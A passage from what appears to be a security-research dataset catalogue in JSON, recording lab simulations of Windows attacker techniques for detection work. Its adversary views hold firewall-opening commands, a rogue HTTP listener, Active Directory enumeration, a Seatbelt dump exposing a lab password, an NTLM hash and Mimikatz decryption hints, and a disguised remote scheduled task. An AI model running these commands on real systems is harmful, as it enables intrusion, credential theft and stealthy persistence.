description=\"python.exe\" program=\"C:\\users\\wardog\\appdata\\local\\programs\\python\\python39\\python.exe\" enable=yes localport=any protocol=tcp remoteip=any\nOk. \n\nPS > & netsh advfirewall firewall add rule name=\"python.exe\" dir=in action=allow description=\"python.exe\" program=\"C:\\users\\wardog\\appdata\\local\\programs\\python\\python39\\python.exe\" enable=yes localport=any protocol=udp remoteip=any\nOk.\n\nStart HTTP Server\n-----------------\nPS > python -m http.server 8000\n\nServing HTTP on :: port 8000 (http://[::]:8000/) ..."}, "references": null}, "SDWIN-201029202324": {"title": "SharpView PCRE.NET", "id": "SDWIN-201029202324", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/10/29", "modification_date": "2020/10/29", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents a threat actor leveraging SharpView and specific functions such as Get-ObjectAcl creating files and loading dlls related to PCRE.NET use.", "attack_mappings": [{"technique": "T1059", "sub-technique": null, "tactics": ["TA0002"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/execution/host/cmd_sharpview_pcre_net.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "C:\\ProgramData>SharpView.exe Get-ObjectAcl -SamAccountName \"Domain Admins\"\n[Get-DomainSearcher] search base: LDAP://MORDORDC.THESHIRE.LOCAL/DC=THESHIRE,DC=LOCAL\n[Get-DomainObjectAcl] Get-DomainObjectAcl filter string: (&(|(|(samAccountName=Domain Admins)(name=Domain Admins)(displayname=Domain Admins))))\nObjectDN : CN=Domain Admins,CN=Users,DC=theshire,DC=local\nObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent\nObjectAceType : 4c164200-20c0-11d0-a768-00aa006e0529\nInheritedObjectAceType : 
4828cc14-1437-45bc-9b07-ad6f015e5f28\nBinaryLength : 60\nAceQualifier : AccessAllowed\nIsCallback : False\nOpaqueLength : 0\nAccessMask : 16\nSecurityIdentifier : S-1-5-32-554\nAceType : AccessAllowedObject\nAceFlags : None\nIsInherited : False\nInheritanceFlags : None\nPropagationFlags : None\nAuditFlags : None\nObjectSID : S-1-5-21-3140987116-517580383-2541594433-512\nActiveDirectoryRights : ReadProperty\n..\n....."}, "references": ["https://github.com/tevora-threat/SharpView", "https://twitter.com/rbmaslen/status/1321859647091970051", "https://twitter.com/tifkin_/status/1321916444557365248"]}, "SDWIN-201102041306": {"title": "PowerShell HTTP Listener", "id": "SDWIN-201102041306", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/11/02", "modification_date": "2020/11/02", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents a threat actor using PowerShell to start an HTTP Listener on a compromised endpoint", "attack_mappings": [{"technique": "T1059", "sub-technique": "001", "tactics": ["TA0002"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/execution/host/psh_powershell_httplistener.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "PowerShell", "module": "PowerShell", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "$Hso = New-Object Net.HttpListener\n$Hso.Prefixes.Add(\"http://+:8000/\")\n$Hso.Start() "}, "references": ["https://docs.microsoft.com/en-us/dotnet/api/system.net.httplistener?view=netcore-3.1"]}, "SDWIN-201102163918": {"title": "Seatbelt Group User Discovery", "id": "SDWIN-201102163918", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/11/02", "modification_date": "2020/11/02", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents a threat actor using 
Seatbelt profiling an endpoint. This specifically uses the -group=user command.", "attack_mappings": [{"technique": "T1012", "sub-technique": null, "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/cmd_seatbelt_group_user.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": "https://github.com/GhostPack/Seatbelt"}], "permissions_required": ["Administrator"], "adversary_view": "C:\\Users\\wardog\\Desktop>Seatbelt.exe -group=user\n\n %&&@@@&&\n &&&&&&&%%%, #&&@@@@@@%%%%%%###############%\n &%& %&%% &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%\n%%%%%%%%%%%######%%%#%%####% &%%**# @////(((&%%%%%%######################(((((((((((((((((((\n#%#%%%%%%%#######%#%%####### %&%,,,,,,,,,,,,,,,, @////(((&%%%%%#%#####################(((((((((((((((((((\n#%#%%%%%%#####%%#%#%%####### %%%,,,,,, ,,. ,, @////(((&%%%%%%%######################(#(((#(#((((((((((\n#####%%%#################### &%%...... ... .. @////(((&%%%%%%%###############%######((#(#(####((((((((\n#######%##########%######### %%%...... ... .. @////(((&%%%%%#########################(#(#######((#####\n###%##%%#################### &%%............... @////(((&%%%%%%%%##############%#######(#########((#####\n#####%###################### %%%.. 
@////(((&%%%%%%%################\n &%& %%%%% Seatbelt %////(((&%%%%%%%%#############*\n &%%&&&%%%%% v1.1.0 ,(((&%%%%%%%%%%%%%%%%%,\n #%%%%##,\n\n\n====== ChromePresence ======\n\n C:\\Users\\wardog\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\\n\n 'History' (11/2/2020 4:25:44 PM) : Run the 'ChromeHistory' command\n 'Cookies' (11/2/2020 4:25:45 PM) : Run SharpDPAPI/SharpChrome or the Mimikatz \"dpapi::chrome\" module\n 'Login Data' (11/2/2020 4:25:44 PM) : Run SharpDPAPI/SharpChrome or the Mimikatz \"dpapi::chrome\" module\n Chrome Version : 86.0.4240.183\n Version is 80+, new DPAPI scheme must be used\n====== CloudCredentials ======\n\n====== CredEnum ======\n\n Target : XboxLive\n UserName :\n Password : 45 43 53 32 20 00 00 00 11 F5 17 F2 CA 4E 24 26 0A 61 2C 8B E6 3A 3C 99 9A 09 88 A1 BE 7B BA 72 07 8A 5D CD A1 B3 A4 18 60 38 AD 4B 6D 40 5C 05 68 C3 A6 C8 51 C0 98 7C CB 3C DA AA 65 88 E6 B8 C0 93 BA FE 21 E5 34 7B A0 A9 F2 4B EF 09 D1 1E AE 10 AD 98 E7 AE C6 9B 27 D2 CF 50 39 CC 97 78 E9 0D 82 E3 1B 11 4C 90\n CredentialType : Generic\n PersistenceType : Session\n LastWriteTime : 10/29/2020 5:51:36 PM\n\n Target : threathunterplaybook.com\n UserName : wardog\n Password :\n CredentialType : DomainPassword\n PersistenceType : Enterprise\n LastWriteTime : 10/28/2020 7:13:44 PM\n\n====== dir ======\n\n LastAccess LastWrite Size Path\n\n 20-09-07 20-09-07 0B C:\\Users\\Default\\Documents\\My Music\\\n 20-09-07 20-09-07 0B C:\\Users\\Default\\Documents\\My Pictures\\\n 20-09-07 20-09-07 0B C:\\Users\\Default\\Documents\\My Videos\\\n 20-10-26 20-11-02 1.7KB C:\\Users\\Public\\Desktop\\Git Bash.lnk\n 20-11-02 20-11-02 2.2KB C:\\Users\\Public\\Desktop\\Google Chrome.lnk\n 20-10-08 20-10-28 0B C:\\Users\\Public\\Documents\\Explorer Suite Signatures\\\n 20-09-07 20-09-07 0B C:\\Users\\Public\\Documents\\My Music\\\n 20-09-07 20-09-07 0B C:\\Users\\Public\\Documents\\My Pictures\\\n 20-09-07 20-09-07 0B C:\\Users\\Public\\Documents\\My Videos\\\n 20-10-25 20-11-02 
0B C:\\Users\\wardog\\Desktop\\capa-v1.4.1-windows\\\n 20-10-18 20-11-02 0B C:\\Users\\wardog\\Desktop\\Dumpert-master\\\n 20-10-13 20-11-02 0B C:\\Users\\wardog\\Desktop\\GruntDLL\\\n 20-10-25 20-11-02 0B C:\\Users\\wardog\\Desktop\\mimikatz_trunk\\\n 20-10-29 20-11-02 0B C:\\Users\\wardog\\Desktop\\SharpView-master\\\n 20-10-09 20-11-02 0B C:\\Users\\wardog\\Desktop\\SimpleInjection\\\n 20-10-13 20-11-02 0B C:\\Users\\wardog\\Desktop\\SimpleInjection 2\\\n 20-10-23 20-10-23 1.9KB C:\\Users\\wardog\\Desktop\\0001.dat\n 20-10-18 20-10-18 81.2KB C:\\Users\\wardog\\Desktop\\Dumpert-master.zip\n 20-10-13 20-10-13 8.4MB C:\\Users\\wardog\\Desktop\\GruntDLL.zip\n 20-10-13 20-10-13 42.1KB C:\\Users\\wardog\\Desktop\\GruntHTTP.bin\n 20-10-21 20-11-02 392.9MB C:\\Users\\wardog\\Desktop\\igfx_win10_100.8853.exe\n 20-10-08 20-11-02 1.4KB C:\\Users\\wardog\\Desktop\\Microsoft Edge.lnk\n 20-10-25 20-11-02 1.2MB C:\\Users\\wardog\\Desktop\\mimikatz.exe\n 20-10-27 20-10-29 33B C:\\Users\\wardog\\Desktop\\my_first_rule\n 20-10-18 20-11-02 74KB C:\\Users\\wardog\\Desktop\\Outflank-Dumpert.exe\n 20-10-28 20-10-29 1.8KB C:\\Users\\wardog\\Desktop\\potential_process_herpaderping.yara\n 20-10-27 20-11-02 1.9KB C:\\Users\\wardog\\Desktop\\Process Hacker 2.lnk\n 20-10-26 20-11-02 2.1MB C:\\Users\\wardog\\Desktop\\ProcessHerpaderping.exe\n 20-10-27 20-10-27 1.6KB C:\\Users\\wardog\\Desktop\\ProcessHerpaderping.exe.colors\n 20-10-27 20-10-27 15.7MB C:\\Users\\wardog\\Desktop\\ProcessHerpaderping.exe.viv\n 20-10-23 20-11-02 266.5KB C:\\Users\\wardog\\Desktop\\PurpleSharp.exe\n 20-10-21 20-11-02 505.5KB C:\\Users\\wardog\\Desktop\\Seatbelt.exe\n 20-10-29 20-10-29 651.3KB C:\\Users\\wardog\\Desktop\\SharpView-master.zip\n 20-10-13 20-10-13 1.4MB C:\\Users\\wardog\\Desktop\\SimpleInjection 2.zip\n 20-10-16 20-10-23 53KB C:\\Users\\wardog\\Desktop\\SimpleInjection.dll\n 20-10-08 20-10-08 22.8MB C:\\Users\\wardog\\Desktop\\SimpleInjection.zip\n 20-10-17 20-10-17 15.2KB 
C:\\Users\\wardog\\Desktop\\sysmon.xml\n 20-10-09 20-10-27 209.5KB C:\\Users\\wardog\\Desktop\\test.dll\n 20-10-27 20-10-27 1.1KB C:\\Users\\wardog\\Desktop\\test.dll.colors\n 20-10-10 20-10-10 208.2KB C:\\Users\\wardog\\Desktop\\test.json\n 20-10-09 20-10-12 88.5KB C:\\Users\\wardog\\Desktop\\test2.dll\n 20-10-27 20-11-02 2.1MB C:\\Users\\wardog\\Desktop\\yara64.exe\n 20-10-27 20-11-02 2MB C:\\Users\\wardog\\Desktop\\yarac64.exe\n 20-10-26 20-11-02 0B C:\\Users\\wardog\\Documents\\herpaderping\\\n 20-10-18 20-10-28 0B C:\\Users\\wardog\\Documents\\LocaleMetaData\\\n 20-10-08 20-10-08 0B C:\\Users\\wardog\\Documents\\My Music\\\n 20-10-08 20-10-08 0B C:\\Users\\wardog\\Documents\\My Pictures\\\n 20-10-08 20-10-08 0B C:\\Users\\wardog\\Documents\\My Videos\\\n 20-10-18 20-10-28 0B C:\\Users\\wardog\\Documents\\Raccine(1)\\\n 20-11-02 20-11-02 0B C:\\Users\\wardog\\Documents\\Set-AuditRule-master\\\n 20-10-08 20-10-28 0B C:\\Users\\wardog\\Documents\\TagsRevisited\\\n 20-10-08 20-10-30 0B C:\\Users\\wardog\\Documents\\Visual Studio 2019\\\n 20-10-17 20-10-28 0B C:\\Users\\wardog\\Documents\\WindowsPowerShell\\\n 20-10-08 20-10-08 8.4MB C:\\Users\\wardog\\Documents\\GruntDLL.zip\n 20-10-21 20-11-02 8.1KB C:\\Users\\wardog\\Documents\\Mordor-WinEvents.psm1\n 20-11-02 20-11-02 208.2KB C:\\Users\\wardog\\Documents\\psh_powershell_httplistener_2020-11-0204130683.json\n 20-10-29 20-10-29 3.4MB C:\\Users\\wardog\\Documents\\psh_python_webserver_2020-10-2900161507.json\n 20-10-28 20-10-28 208.9KB C:\\Users\\wardog\\Documents\\psh_web_credentials_2020-10-2819191483.json\n 20-10-18 20-10-18 283.3KB C:\\Users\\wardog\\Documents\\Raccine(1).zip\n 20-11-02 20-11-02 879.8KB C:\\Users\\wardog\\Documents\\Set-AuditRule-master.zip\n 20-10-20 20-10-21 10.3KB C:\\Users\\wardog\\Documents\\Set-AuditRule.ps1\n 20-10-16 20-10-16 2.3KB C:\\Users\\wardog\\Documents\\Start-EtwTrace.ps1\n 20-10-16 20-10-16 47.4KB C:\\Users\\wardog\\Documents\\TLGMetadataParser.ps1\n 20-10-16 20-10-16 47.4KB 
C:\\Users\\wardog\\Documents\\TLGMetadataParser.psm1\n 20-10-27 20-10-27 6.6KB C:\\Users\\wardog\\Documents\\udl-yara.xml\n 20-10-27 20-10-27 6KB C:\\Users\\wardog\\Documents\\YARA.xml\n 20-10-10 20-10-28 0B C:\\Users\\wardog\\Downloads\\evtx_dump-0.6.8-x86_64-pc-windows-msvc.tar\\\n 20-10-10 20-10-28 0B C:\\Users\\wardog\\Downloads\\fd-v8.1.1-x86_64-pc-windows-msvc\\\n 20-10-08 20-11-02 0B C:\\Users\\wardog\\Downloads\\Koppeling-master\\\n 20-10-27 20-10-28 0B C:\\Users\\wardog\\Downloads\\OpenJDK11U-jdk_x64_windows_hotspot_11.0.9_11\\\n 20-10-19 20-10-28 0B C:\\Users\\wardog\\Downloads\\PSTools\\\n 20-10-09 20-10-28 0B C:\\Users\\wardog\\Downloads\\Sysmon\\\n 20-10-27 20-10-28 0B C:\\Users\\wardog\\Downloads\\yara-v4.0.2-1347-win64\\\n 20-10-25 20-10-25 11.1MB C:\\Users\\wardog\\Downloads\\capa-v1.4.1-windows.zip\n 20-10-10 20-10-10 1.2MB C:\\Users\\wardog\\Downloads\\evtx_dump-0.6.8-x86_64-pc-windows-msvc.tar.gz\n 20-10-10 20-10-10 898.4KB C:\\Users\\wardog\\Downloads\\fd-v8.1.1-x86_64-pc-windows-msvc.zip\n 20-10-27 20-10-27 67.5MB C:\\Users\\wardog\\Downloads\\ghidra-Ghidra_9.1.2_build.zip\n 20-10-08 20-10-08 36.3KB C:\\Users\\wardog\\Downloads\\Koppeling-master.zip\n 20-10-25 20-10-25 1.1MB C:\\Users\\wardog\\Downloads\\mimikatz_trunk.zip\n 20-10-27 20-10-27 186.7MB C:\\Users\\wardog\\Downloads\\OpenJDK11U-jdk_x64_windows_hotspot_11.0.9_11.zip\n 20-10-19 20-10-19 3MB C:\\Users\\wardog\\Downloads\\PSTools.zip\n 20-10-09 20-10-09 1.8MB C:\\Users\\wardog\\Downloads\\Sysmon.zip\n 20-10-27 20-10-27 2MB C:\\Users\\wardog\\Downloads\\yara-v4.0.2-1347-win64.zip\n====== DpapiMasterKeys ======\n\n Folder : C:\\Users\\wardog\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3940915590-64593676-1414006259-500\n\n LastAccessed LastModified FileName\n ------------ ------------ --------\n 10/18/2020 3:41:37 AM 10/18/2020 3:41:37 AM ad27dbc8-def4-4b0d-bfbd-89b429dfe9fe\n\n\n [*] Use the Mimikatz \"dpapi::masterkey\" module with appropriate arguments (/pvk or /rpc) to decrypt\n 
[*] You can also extract many DPAPI masterkeys from memory with the Mimikatz \"sekurlsa::dpapi\" module\n [*] You can also use SharpDPAPI for masterkey retrieval.\n====== ExplorerMRUs ======\n\n Explorer BUILTIN\\Administrators 2020-11-02 C:\\Users\\wardog\\Documents\\cmd_psexec_lsa_secrets_dump_2020-10-2001090629.json\n Explorer BUILTIN\\Administrators 2020-11-02 C:\\Users\\wardog\\Documents\\AMSITLGTrace.evtx\n Explorer BUILTIN\\Administrators 2020-11-02 C:\\Windows\\System32\\amsi.dll\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Documents\\Mordor-WinEvents.psm1\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Documents\\MordorDataset.json\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Documents\\mordor_raccine_simulation_mode_2020-10-18T05154752.evtx\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Downloads\\Koppeling-master\\Koppeling-master\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Downloads\\Koppeling-master\\Koppeling-master\\Koppeling.sln\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Desktop\\LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Windows\\System32\\winevt\\Logs\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-Sysmon%4Operational.evtx\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Desktop\\GruntDLL\\GruntDLL\\GruntDLL.sln\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Documents\\Export-WinEvents.ps1\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\export.evtx\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Downloads\\ghidra-Ghidra_9.1.2_build\\ghidra-Ghidra_9.1.2_build\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Desktop\\GruntDLL\\GruntDLL\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Desktop\\GruntDLL.zip\n Explorer 
BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\export.json\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Documents\\Export-EventLogs.ps1\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Desktop\\Dumpert-master\\Dumpert-master\\Dumpert\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Desktop\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Downloads\\ghidra-Ghidra_9.1.2_build\\ghidra-Ghidra_9.1.2_build\\DevGuide.md\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Documents\\cmd_sam_copy_esentutl_2020-10-1900171197.json\n Explorer BUILTIN\\Administrators 2020-10-30 C:\\Users\\wardog\\Documents\\cmd_sam_copy_esentutl_2020-10-1823514110.json\n Explorer BUILTIN\\Administrators 2020-10-29 C:\\Users\\wardog\\Desktop\\SharpView-master\\SharpView-master\n Explorer BUILTIN\\Administrators 2020-10-29 C:\\Users\\wardog\\Desktop\\SharpView-master\\SharpView-master\\SharpView.sln\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\YARA.xml\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Downloads\\yara-v4.0.2-1347-win64.zip\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\wmic_remote_xsl_jscript4.json\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\wmic_remote_xsl_jscript5.json\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\wmic_remote_xsl_jscript3.json\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Desktop\\wmic_remote_xsl_jscript2.json\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\wmic_remote_xsl_jscript.json\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\udl-yara.xml\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\TLGMetadataParser.ps1\n Explorer BUILTIN\\Administrators 2020-10-28 
C:\\Users\\wardog\\Documents\\TLGMetadataParser.psm1\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Desktop\\test.txt\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\test.json\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\test.ps1\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\test.evtx\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Windows\\System32\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Desktop\\sysmon.xml\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\Start-EtwTrace.ps1\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Desktop\\SimpleInjection 2\\SimpleInjection\\SimpleInjection.sln\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Desktop\\SimpleInjection\\SimpleInjection.zip\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Desktop\\SimpleInjection 2\\SimpleInjection\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Desktop\\SimpleInjection 2.zip\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\Set-AuditRule.ps1\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\Security.json\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\raccine_simulation_mode_2020-10-18T05154752.evtx\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\raccine_2020-10-18T04185015.json\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Desktop\\potential_process_herpaderping.yara\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Desktop\\potential_process_herpaderping.txt\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Desktop\\Dumpert-master\\Dumpert-master\\Dumpert\\Outflank-Dumpert.sln\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\out8.evtx\n Explorer BUILTIN\\Administrators 2020-10-28 
C:\\Users\\wardog\\Documents\\out7.evtx\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\out6.evtx\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\out5.evtx\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\out3.evtx\n Explorer BUILTIN\\Administrators 2020-10-28 C:\\Users\\wardog\\Documents\\out4.evtx\n====== ExplorerRunCommands ======\n\n====== FileZilla ======\n\n====== FirefoxPresence ======\n\n====== IdleTime ======\n\n CurrentUser : WORKSTATION5\\wardog\n Idletime : 00h:00m:00s:015ms (15 milliseconds)\n\n====== IEFavorites ======\n\nFavorites (wardog):\n\n http://go.microsoft.com/fwlink/p/?LinkId=255142\n\n====== IETabs ======\n\n====== IEUrls ======\n\nInternet Explorer typed URLs for the last 7 days\n\n====== MappedDrives ======\n\nMapped Drives (via WMI)\n\n====== MTPuTTY ======\n\n====== OfficeMRUs ======\n\nEnumerating Office most recently used files for the last 7 days\n\n App User LastAccess FileName\n --- ---- ---------- --------\n====== PowerShellHistory ======\n\n====== PuttyHostKeys ======\n\n====== PuttySessions ======\n\n====== RDCManFiles ======\n\n====== RDPSavedConnections ======\n\n====== SecPackageCreds ======\n\n Version : NetNTLMv1\n Hash : wardog::WORKSTATION5:99c43e8b88a02e13bae1b088a24d3a90aa64487f8da1e2fd:99c43e8b88a02e13bae1b088a24d3a90aa64487f8da1e2fd:1122334455667788\n\n====== SlackDownloads ======\n\n====== SlackPresence ======\n\n====== SlackWorkspaces ======\n\n====== SuperPutty ======\n\n====== TokenGroups ======\n\nCurrent Token's Groups\n\n WORKSTATION5\\None S-1-5-21-3940915590-64593676-1414006259-513\n Everyone S-1-1-0\n NT AUTHORITY\\Local account and member of Administrators group S-1-5-114\n BUILTIN\\Administrators S-1-5-32-544\n BUILTIN\\Performance Log Users S-1-5-32-559\n BUILTIN\\Users S-1-5-32-545\n BUILTIN\\Remote Desktop Users S-1-5-32-555\n NT AUTHORITY\\REMOTE INTERACTIVE LOGON S-1-5-14\n NT AUTHORITY\\INTERACTIVE S-1-5-4\n NT 
AUTHORITY\\Authenticated Users S-1-5-11\n NT AUTHORITY\\This Organization S-1-5-15\n NT AUTHORITY\\Local account S-1-5-113\n LOCAL S-1-2-0\n NT AUTHORITY\\NTLM Authentication S-1-5-64-10\n====== WindowsCredentialFiles ======\n\n Folder : C:\\windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials\n\n FileName : DFBE70A7E5CC19A398EBF1B96859CE5D\n Description : Local Credential Data\n MasterKey : 4e3bccc6-a1eb-4076-b723-6456d3dec626\n Accessed : 11/2/2020 4:39:13 PM\n Modified : 11/2/2020 4:39:13 PM\n Size : 11184\n\n\n Folder : C:\\windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Microsoft\\Credentials\n\n FileName : DFBE70A7E5CC19A398EBF1B96859CE5D\n Description : Local Credential Data\n MasterKey : 4e3bccc6-a1eb-4076-b723-6456d3dec626\n Accessed : 11/2/2020 4:39:13 PM\n Modified : 11/2/2020 4:39:13 PM\n Size : 11184\n\n\n Folder : C:\\windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Microsoft\\Credentials\n\n FileName : DFBE70A7E5CC19A398EBF1B96859CE5D\n Description : Local Credential Data\n MasterKey : 4e3bccc6-a1eb-4076-b723-6456d3dec626\n Accessed : 11/2/2020 4:39:13 PM\n Modified : 11/2/2020 4:39:13 PM\n Size : 11184\n\n\n Folder : C:\\Users\\wardog\\AppData\\Local\\Microsoft\\Credentials\\\n\n FileName : DFBE70A7E5CC19A398EBF1B96859CE5D\n Description : Local Credential Data\n MasterKey : ad27dbc8-def4-4b0d-bfbd-89b429dfe9fe\n Accessed : 11/2/2020 4:39:13 PM\n Modified : 11/2/2020 4:39:13 PM\n Size : 11184\n\n\n Folder : C:\\Users\\wardog\\AppData\\Roaming\\Microsoft\\Credentials\\\n\n FileName : 38924BBFD1C490D90FFE70EECB3A3739\n Description : Enterprise Credential Data\n MasterKey : ad27dbc8-def4-4b0d-bfbd-89b429dfe9fe\n Accessed : 11/2/2020 4:39:13 PM\n Modified : 11/2/2020 4:39:13 PM\n Size : 474\n\n\n====== WindowsVault ======\n\n\n Vault GUID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28\n Vault Type : Web Credentials\n Item count : 1\n SchemaGuid : 3ccd5499-87a8-4b10-a215-608888dd3b55\n Resource : String: 
http://ossemproject.com\n Identity : String: pgustavo\n PackageSid : (null)\n Credential : String: Pass@Word\n LastModified : 10/28/2020 11:18:10 PM\n\n Vault GUID : 77bc582b-f0a6-4e15-4e80-61736b6f3b29\n Vault Type : Windows Credentials\n Item count : 1\n SchemaGuid : 3e0e35be-1b77-43e7-b873-aed901b6275b\n Resource : String: Domain:target=threathunterplaybook.com\n Identity : String: wardog\n PackageSid : (null)\n Credential :\n LastModified : 10/28/2020 11:13:44 PM\n\n\n[*] Completed collection in 1.834 seconds\n\nC:\\Users\\wardog\\Desktop> "}, "references": ["https://docs.microsoft.com/en-us/dotnet/api/system.net.httplistener?view=netcore-3.1"]}, "SDWIN-201219070027": {"title": "Remote Scheduled Task Creation", "id": "SDWIN-201219070027", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/12/19", "modification_date": "2020/12/19", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents a threat actor creating a scheduled task remotely using schtasks.", "attack_mappings": [{"technique": "T1053", "sub-technique": "005", "tactics": ["TA0002", "TA0003", "TA0004", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/schtask_create.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/schtask_create.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "PS C:\\windows\\system32> C:\\Windows\\system32\\cmd.exe /C schtasks /create /F /tn \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" /tr \"C:\\Windows\\system32\\cmd.exe /C C:\\Windows\\System32\\notepad.exe\" /sc ONSTART /ru system /S WORKSTATION6\nSUCCESS: The scheduled task 
\"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" has successfully been created.\nPS C:\\windows\\system32> "}, "references": ["https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/"]}, "SDWIN-201219075059": {"title": "Remote Scheduled Task Modification", "id": "SDWIN-201219075059", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/12/19", "modification_date": "2020/12/19", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents a threat actor modifying a scheduled task remotely.", "attack_mappings": [{"technique": "T1053", "sub-technique": "005", "tactics": ["TA0002", "TA0003", "TA0004", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/schtask_modification.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/schtask_modification.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "PowerShell", "module": "PowerShell", "script": null}], "permissions_required": 